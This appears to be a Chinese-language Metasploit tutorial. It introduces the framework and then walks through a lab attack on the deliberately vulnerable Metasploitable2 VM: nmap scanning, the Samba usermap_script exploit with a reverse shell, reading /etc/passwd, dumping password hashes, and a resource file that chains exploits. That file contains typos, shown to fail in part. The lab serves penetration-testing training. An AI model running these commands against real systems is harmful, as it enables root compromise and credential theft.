漏洞利用实践

漏洞利用实践

Metasploit 框架介绍

Metasploit Framework介绍

  • Metasploit Framework是Rapid7 公司开源漏洞开发与利用框架(免费),当然也通过商业版本(付费).
  • 下载:https://www.metasploit.com/

  • Metasploit Framework目标就是更好的帮助IT人员更好的完成评估。框架采用Ruby语言编写,如果想更深刻的使用框架,建议学习Ruby语言。
  • Metasploit Framework当中所有任务都是基于模块实现的,有利于扩展和编写代码,更容易实现复杂安全评估。
  • Metasploit Framework框架组成结构可以划分分为:库,接口,模块。

Metasploit库介绍

  • Metasploit Framework框架提供编程API以便使用者可以进行模块的开发,库类似于封装好的代码,使用者直接调用,完成逻辑设计就可以。
  • Metasploit Framework库文件位置:/usr/share/metasploit-framework/lib/
┌──(root💀kali)-[~/Desktop]
└─# ls /usr/share/metasploit-framework/lib/
anemone        expect.rb   msf_autoload.rb  net              rabal       rex        rubocop  sqlmap     telephony.rb
anemone.rb     metasploit  msfenv.rb        postgres         rbmysql     rex.rb     snmp     tasks      windows_console_color_support.rb
enumerable.rb  msf         msf.rb           postgres_msf.rb  rbmysql.rb  robots.rb  snmp.rb  telephony
  • 其中Rex库用于提供漏洞利用各种类库,也提供套接字连接, 原始函数和各种其他重新格式化。
┌──(root💀kali)-[/usr/share/metasploit-framework]
└─# ls lib/rex
crypto         google  job_container.rb  json_hash_file.rb  logging.rb  parser    payloads.rb  post.rb  proto.rb  script.rb           service.rb  tar.rb             time.rb         ui     user_agent.rb
exceptions.rb  io      job.rb            logging            mac_oui.rb  payloads  post         proto    script    service_manager.rb  services    thread_factory.rb  transformer.rb  ui.rb
  • 其中core核心库为所有新模块提供基本的应用程序接口(API)。
──(root💀kali)-[/usr/share/metasploit-framework]
└─# ls lib/msf/core 
analyze.rb         db_import_error.rb  event_dispatcher.rb  general_event_subscriber.rb  module_set.rb         opt_enum.rb            opt_regexp.rb         post                      session
author.rb          db_manager          exception.rb         handler                      modules.rb            opt_float.rb           opt_string.rb         post_mixin.rb             session_event.rb
auxiliary          db_manager.rb       exe                  handler.rb                   nop.rb                opt_http_rhost_url.rb  payload               post.rb                   session_manager.rb
auxiliary.rb       encoded_payload.rb  exploit              host_state.rb                opt_address_local.rb  opt_int.rb             payload_generator.rb  README.md                 session.rb
cert_provider.rb   encoder             exploit_driver.rb    module                       opt_address_range.rb  option_container.rb    payload.rb            reference.rb              site_reference.rb
constants.rb       encoder.rb          exploit_event.rb     module_manager               opt_address.rb        opt_path.rb            payload_set.rb        reflective_dll_loader.rb  target.rb
database_event.rb  encoding            exploit.rb           module_manager.rb            opt_base.rb           opt_port.rb            platform.rb           rpc                       thread_manager.rb
data_store.rb      evasion_driver.rb   feature_manager.rb   module.rb                    opt_bool.rb           opt_raw.rb             plugin_manager.rb     rpc.rb                    web_services
db_export.rb       evasion.rb          framework.rb         modules                      opt_condition.rb      opt.rb                 plugin.rb             service_state.rb          web_services.rb

Metasploit接口介绍

  • 最新版本的Metasploit Framework提供接口有控制台和GUI两种接口。控制台接口可以通过在终端中输入msfconsole启动。
┌──(root💀kali)-[~/Desktop]
└─# msfconsole

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.                                                                                                 
                 ; |___      \-``                                                                                              
                 \   --<                                                                                                         
                  `.`.<                                                                                                         
                    `-'                                                                                                        


       =[ metasploit v6.0.30-dev                          ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command

msf6 > 
  • 对于GUI接口Metasploit需要使用Armitage,最新版本的Kali Linux没有集成Armitage,因此需要自行安装,可以通过在终端输入apt-get install armitage进行安装。
┌──(root💀kali)-[~/Desktop]
└─# apt-get install armitage
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成                 
下列【新】软件包将被安装:
  armitage
升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 2 个软件包未被升级。
需要下载 3,916 kB 的归档。
解压缩后会消耗 8,252 kB 的额外空间。
获取:1 http://mirrors.aliyun.com/kali kali-rolling/main amd64 armitage all 20160709+ds1-0kali2 [3,916 kB]
已下载 3,916 kB,耗时 6秒 (610 kB/s)                                                                                                                                                                                                       
正在选中未选择的软件包 armitage。
(正在读取数据库 ... 系统当前共安装有 267967 个文件和目录。)
准备解压 .../armitage_20160709+ds1-0kali2_all.deb  ...
正在解压 armitage (20160709+ds1-0kali2) ...
正在设置 armitage (20160709+ds1-0kali2) ...
正在处理用于 kali-menu (2021.1.4) 的触发器 ...
  • 在终端中输入armitage启动GUI版的Metasploit Framework框架。
# 如果是第一次安装需要初始化Metasploit Frameworks数据库文件
┌──(root💀kali)-[~/Desktop]
└─# msfdb init              
[+] Starting database
[+] Creating database user 'msf'
为新角色输入的口令: 
再输入一遍: 
[+] Creating databases 'msf'
┏━(Message from Kali developers)
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating databases 'msf_test'
┏━(Message from Kali developers)
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

┌──(root💀kali)-[~/Desktop]
└─# armitage
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

  • 下次启动Metasploit Framework时需要,需要执行systemctl start postgresql启动armitage的依赖服务。
┌──(root💀kali)-[~/Desktop]
└─# systemctl start postgresql                                                                                                  

┌──(root💀kali)-[~/Desktop]
└─# systemctl status postgresql
● postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: active (exited) since Wed 2021-03-17 08:31:33 EDT; 1min 58s ago
    Process: 1464 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 1464 (code=exited, status=0/SUCCESS)
        CPU: 3ms

3月 17 08:31:33 kali systemd[1]: Starting PostgreSQL RDBMS...
3月 17 08:31:33 kali systemd[1]: Finished PostgreSQL RDBMS.

Metasploit模块介绍

  • 在Metasploit所有的任务都是以模块化方式执行的,为了方便管理模块,Metasploit将具有不通功能的模块根据实质作用进行的分类。
  • Exploit模块,Payload模块,辅助模块,POST模块,编码模块,无操作NOP模块,Evasion。

  • Kali Linux下的Metaploit Framework框架将模块存储在/usr/share/metasploit-framework/modules目录下。

┌──(root💀kali)-[~/Desktop]
└─# ls /usr/share/metasploit-framework/modules
auxiliary  encoders  evasion  exploits  nops  payloads  post

Metasploit数据库设置

  • Metasploit在启动时建议将数据库文件进行初始化并运行postgresql数据库。初始化数据库文件可以使用msfdb init进行初始化。初始化完毕以后,在msfconsole中使用db_status查看数据库连接状态。
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

Metaploit工作空间管理

  • msfocnsole控制端中,为了区分不同的工作任务可以使用workspace来管理。默认使用default工作空间。使用workspace -h查看具体命令。
msf6 > workspace -h
Usage:
    workspace                  List workspaces
    workspace -v               List workspaces verbosely
    workspace [name]           Switch workspace
    workspace -a [name] ...    Add workspace(s)
    workspace -d [name] ...    Delete workspace(s)
    workspace -D               Delete all workspaces
    workspace -r <old> <new>   Rename workspace
    workspace -h               Show this help information

  • workspace -v详细列举出工作空间信息,直接使用workspace列举只有空间名称。
msf6 > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0
  • workspace -a 空间名称,添加指定空间名称的工作空间到msfconsole中。
msf6 > workspace -a test
[*] Added workspace: test
[*] Workspace: test
  • workspace -d 空间名称,删除指定空间名称的工作空间。
msf6 > workspace -a
  default
  test
* test2
msf6 > workspace -d test2
[*] Deleted workspace: test2
[*] Switched to workspace: default
msf6 > workspace -a
  test
* default
  • workspace -r 空间名称 新空间名称,将旧空间名称修改为新空间名称。
msf6 > workspace -a
  test
* default
msf6 > workspace -r test newtest
[*] Renamed workspace 'test' to 'newtest'
msf6 > workspace -a
  newtest
* default
  • 因为在msfconsole终端中只能同时对单一目标进行测试,所以有了工作空间的含义。针对不同任务建议使用不同的工作空间。使用workspace 空间名称,进行工作空间的切换。
msf6 > workspace -a
  newtest
* default
msf6 > workspace newtest
[*] Workspace: newtest
msf6 > workspace -a
  default
* newtest

注意:请勿轻易使用workspace -D,会直接删除所有工作空间。

Metasploit 基本exploit使用

实验环境介绍与搭建

  • Metasploitable2虚拟系统是一个特别制作的ubuntu系统,本身设计作为安全工具测试和演示漏洞常见漏洞攻击。版本3以及可以下载了,并且比上一个版本包含更多可用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴露漏洞在一个易受攻击的网络中。
  • 下载:https://sourceforge.net/projects/metasploitable/
  • 安装和使用。
  • 下载完成后解压文件,虚拟机软件打开后缀名为.vmx,点击启动客户机/开机。

  • 使用用户名msfadmin和密码msfadmin登录系统,然后使用netdiscover -r 192.168.10.1/24扫描。
┌──(root💀kali)-[~/桌面]
└─# netdiscover -r 192.168.10.1/24 
 Currently scanning: Finished!   |   Screen View: Unique Hosts            

 5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 300                                                                                                                                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.10.1    00:50:56:c0:00:08      1      60  VMware, Inc.                                                             
 192.168.10.2    00:50:56:e6:53:88      1      60  VMware, Inc.                                                             
 192.168.10.183  00:0c:29:10:d2:96      1      60  VMware, Inc.                                                             
 192.168.10.254  00:50:56:fc:3f:5d      2     120  VMware, Inc.  

Nmap探测目标并保存结果

  • 在终端中nmap -sV -P0 192.168.10.183 -oA target
┌──(root💀kali)-[~/桌面]
└─# nmap -sV -P0 192.168.10.183 -oA target                                                                                                                                                                                            
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 21:16 EDT
Nmap scan report for 192.168.10.183
Host is up (0.0012s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:10:D2:96 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.08 seconds
  • 探测完成之后使用ls -alh查看输出文件。
┌──(root💀kali)-[~/桌面]
└─# ls -alh
总用量 28K
drwxr-xr-x  2 root root 4.0K  3月 17 21:16 .
drwx------ 20 root root 4.0K  3月 17 21:09 ..
-rw-r--r--  1 root root 1.4K  3月 17 21:16 target.gnmap
-rw-r--r--  1 root root 1.7K  3月 17 21:16 target.nmap
-rw-r--r--  1 root root  11K  3月 17 21:16 target.xml

Metasploit中导入Nmap结果

  • 在终端中打开msfconsole打开Metasploit Framework终端接口,使用db_import导入探测结果xml文件。
┌──(root💀kali)-[~/桌面]
└─# db_import 路径/文件名.xml
# 我的这个方法不行

# 直接在msfconsole中执行扫描db_nmap 192.168.10.183
msf6 > db_nmap 192.168.10.183
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 21:45 EDT
[*] Nmap: Nmap scan report for 192.168.10.183
[*] Nmap: Host is up (0.0043s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 21/tcp   open  ftp
[*] Nmap: 22/tcp   open  ssh
[*] Nmap: 23/tcp   open  telnet
[*] Nmap: 25/tcp   open  smtp
[*] Nmap: 53/tcp   open  domain
[*] Nmap: 80/tcp   open  http
[*] Nmap: 111/tcp  open  rpcbind
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 512/tcp  open  exec
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  shell
[*] Nmap: 1099/tcp open  rmiregistry
[*] Nmap: 1524/tcp open  ingreslock
[*] Nmap: 2049/tcp open  nfs
[*] Nmap: 2121/tcp open  ccproxy-ftp
[*] Nmap: 3306/tcp open  mysql
[*] Nmap: 5432/tcp open  postgresql
[*] Nmap: 5900/tcp open  vnc
[*] Nmap: 6000/tcp open  X11
[*] Nmap: 6667/tcp open  irc
[*] Nmap: 8009/tcp open  ajp13
[*] Nmap: 8180/tcp open  unknown
[*] Nmap: MAC Address: 00:0C:29:10:D2:96 (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
  • 使用hosts查看是否导入成功。
msf6 > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.10.183  00:0c:29:10:d2:96        Unknown                    device
  • 使用services查看当前工作空间中的服务信息。
msf6 > services
Services
========

host            port  proto  name          state  info
----            ----  -----  ----          -----  ----
192.168.10.183  21    tcp    ftp           open
192.168.10.183  22    tcp    ssh           open
192.168.10.183  23    tcp    telnet        open
192.168.10.183  25    tcp    smtp          open
192.168.10.183  53    tcp    domain        open
192.168.10.183  80    tcp    http          open
192.168.10.183  111   tcp    rpcbind       open
192.168.10.183  139   tcp    netbios-ssn   open
192.168.10.183  445   tcp    microsoft-ds  open
192.168.10.183  512   tcp    exec          open
192.168.10.183  513   tcp    login         open
192.168.10.183  514   tcp    shell         open
192.168.10.183  1099  tcp    rmiregistry   open
192.168.10.183  1524  tcp    ingreslock    open
192.168.10.183  2049  tcp    nfs           open
192.168.10.183  2121  tcp    ccproxy-ftp   open
192.168.10.183  3306  tcp    mysql         open
192.168.10.183  5432  tcp    postgresql    open
192.168.10.183  5900  tcp    vnc           open
192.168.10.183  6000  tcp    x11           open
192.168.10.183  6667  tcp    irc           open
192.168.10.183  8009  tcp    ajp13         open
192.168.10.183  8180  tcp    unknown       open

Metasploit对漏洞进行EXP利用

  • 使用search命令查找符合要求的信息。
msf6 > search samba
msf6 > search samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   1   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   2   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   3   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   4   auxiliary/scanner/rsync/modules_list                                  normal     No     List Rsync Modules
   5   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   6   exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   7   exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   8   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   9   exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   11  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   12  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   13  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   14  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   15  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   16  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   17  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   18  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   19  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   20  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   21  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   22  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   23  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   24  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   25  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations


Interact with a module by name or index. For example info 25, use 25 or use post/linux/gather/enum_configs

  • 使用info exp路径查看漏洞信息。
msf6 > info exploit/multi/samba/usermap_script 

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html
  • 使用EXP通过use EXP 路径,完成加载,set payload设置返回shell。
msf6 > use exploit/multi/samba/usermap_script 
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/
set payload cmd/unix/bind_awk                   set payload cmd/unix/bind_ruby                  set payload cmd/unix/reverse_ksh                set payload cmd/unix/reverse_r
set payload cmd/unix/bind_busybox_telnetd       set payload cmd/unix/bind_ruby_ipv6             set payload cmd/unix/reverse_lua                set payload cmd/unix/reverse_ruby
set payload cmd/unix/bind_inetd                 set payload cmd/unix/bind_socat_udp             set payload cmd/unix/reverse_ncat_ssl           set payload cmd/unix/reverse_ruby_ssl
set payload cmd/unix/bind_jjs                   set payload cmd/unix/bind_zsh                   set payload cmd/unix/reverse_netcat             set payload cmd/unix/reverse_socat_udp
set payload cmd/unix/bind_lua                   set payload cmd/unix/generic                    set payload cmd/unix/reverse_netcat_gaping      set payload cmd/unix/reverse_ssh
set payload cmd/unix/bind_netcat                set payload cmd/unix/pingback_bind              set payload cmd/unix/reverse_openssl            set payload cmd/unix/reverse_ssl_double_telnet
set payload cmd/unix/bind_netcat_gaping         set payload cmd/unix/pingback_reverse           set payload cmd/unix/reverse_perl               set payload cmd/unix/reverse_tclsh
set payload cmd/unix/bind_netcat_gaping_ipv6    set payload cmd/unix/reverse                    set payload cmd/unix/reverse_perl_ssl           set payload cmd/unix/reverse_zsh
set payload cmd/unix/bind_perl                  set payload cmd/unix/reverse_awk                set payload cmd/unix/reverse_php_ssl            
set payload cmd/unix/bind_perl_ipv6             set payload cmd/unix/reverse_bash_telnet_ssl    set payload cmd/unix/reverse_python             
set payload cmd/unix/bind_r                     set payload cmd/unix/reverse_jjs                set payload cmd/unix/reverse_python_ssl         
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
  • show options显示需要配置的选项。
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.184   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
  • 使用set 参数名 值,来完成参数设置。
# 设置目标IP
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.10.183
rhosts => 192.168.10.183
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.10.183   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.184   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
  • 使用run或者exploit开启利用EXP。
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.10.184:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo bVosoMqzNnUV2S88;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "bVosoMqzNnUV2S88\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.184:4444 -> 192.168.10.183:36435) at 2021-03-17 22:09:13 -0400


id
uid=0(root) gid=0(root)
whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
  • 使用sessions查看全部连接设备。
^Z
Background session 2? [y/N]  Y
msf6 exploit(multi/samba/usermap_script) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.184:4444 -> 192.168.10.183:50367 (192.168.10.183)

  • 使用sessions -l查看当前后台会话,使用sessions -i id值,切换会话。
msf6 exploit(multi/samba/usermap_script) > sessions -l

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.184:4444 -> 192.168.10.183:50367 (192.168.10.183)

msf6 exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 2...
  • 利用post模块中的hashdump获取建立会话之后目标的hash值。
msf6 exploit(multi/samba/usermap_script) > use post/linux/gather/hashdump 
msf6 post(linux/gather/hashdump) > set session 1
session => 1
msf6 post(linux/gather/hashdump) > exploit

[!] SESSION may not be compatible with this module.
[+] root:1/avpfBJ1x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:1fUX6BPOtMiyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:1f2ZVMS4KR9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:1XN10Zj2cRt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:1Rw35ik.xMgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:1HESu9xrHk.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:1kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20210317221902_default_192.168.10.183_linux.hashes_021240.txt
[*] Post module execution completed

Metasploit 资源文件多目标安全测试

Metasploit命令终端缺点

  • 不能同时对多个目标进行测试,而且单纯依靠命令输入,很是乏力。为了弥补不足,Metasploit Framework框架提供资源文件接口,可以在资源文件中输入对应的终端命令,msfconsole读取资源文件后,执行其中的命令,避免多次重复写入。当然也可以直接输入多个目标进行测试。

Metasploit资源文件设置

  • 资源文件本质上都是分隔的文本文件,其中包括msfconsole执行的一系列命令。资源文件是以.rc结尾的文本文件。
┌──(root💀kali)-[~/桌面]
└─# vim test.rc     

use exploit/multi/samba/usermap_script
set pyload cmd/unix/reverse
set rhost 192.168.10.183
set lhost 192.168.10.184
exploit -j
use exploit/unix/ftp/vsftpd_234_backdor
set pyload cmd/unix/interact
set rhost 193.168.10.183
exploit -j
  • 其中exploit -j表示将建立的session会话置于后台。也可以再输入其他测试命令。在终端中使用msfconsole -r test.rc执行资源文件。
┌──(root💀kali)-[~/桌面]
└─# msfconsole -r test.rc  
...

Metasploit tip: You can use help to view all 
available commands

[*] Processing test.rc for ERB directives.
resource (test.rc)> use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (test.rc)> set pyload cmd/unix/reverse
pyload => cmd/unix/reverse
resource (test.rc)> set rhost 192.168.10.183
rhost => 192.168.10.183
resource (test.rc)> set lhost 192.168.10.184
lhost => 192.168.10.184
resource (test.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (test.rc)> use exploit/unix/ftp/vsftpd_234_backdor
[*] Started reverse TCP handler on 192.168.10.184:4444 
[-] No results from search
[-] Failed to load module: exploit/unix/ftp/vsftpd_234_backdor
resource (test.rc)> set pyload cmd/unix/interact
pyload => cmd/unix/interact
resource (test.rc)> set rhost 193.168.10.183
rhost => 193.168.10.183
resource (test.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

